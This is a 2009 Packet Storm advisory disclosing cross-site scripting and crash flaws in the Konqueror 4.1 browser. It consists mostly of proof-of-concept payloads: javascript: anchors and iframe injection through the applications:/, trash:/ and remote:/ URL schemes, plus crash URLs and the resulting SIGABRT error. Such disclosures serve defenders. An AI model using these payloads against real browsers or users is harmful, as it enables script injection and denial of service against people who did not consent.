Konqueror 4.1 XSS / Denial Of Service

2009-01-02T00:00:00
ID PACKETSTORM:73528
Type packetstorm
Reporter StAkeR
Modified 2009-01-02T00:00:00

Description

                                        
                                            `+-----------------------------------------------------+  
| Konqueror <= 4.1 XSS / Remote Crash Vulnerabilities |  
+-----------------------------------------------------+  
| by athos - staker[at]hotmail[dot]it |  
| http://konqueror.kde.org |  
+-----------------------------------------------------+  
| Cross Site Scripting |  
| |  
| applications:/<a href="javascript:alert(1)">Here</a>|  
| trash:/<a href="javascript:alert(1)">Here</a> |  
| remote:/<a href="javascript:alert(1)">Here</a> |  
| |  
| you can write anything (example) |  
| |  
| applications:/<font size="8">THE GAME</font> |  
| applications:/<iframe src="http://milw0rm.com"> |  
+-----------------------------------------------------+  
| Remote Crash Vulnerabilities |  
| |  
| remote://crash:konqueror@ |  
| applications://crash:konqueror@ |  
+-----------------------------------------------------+  
| Error Details... |  
| |  
| A Fatal Error Occurred The application Konqueror |  
| (konqueror) crashed and caused the signal 6(SIGABRT)|   
| Please help us improve the software you use by |  
| filing a report at http://bugs.kde.org. Useful |  
| details include how to reproduce the error, |  
| documents that were loaded, etc. |  
+-----------------------------------------------------+  
  
  
`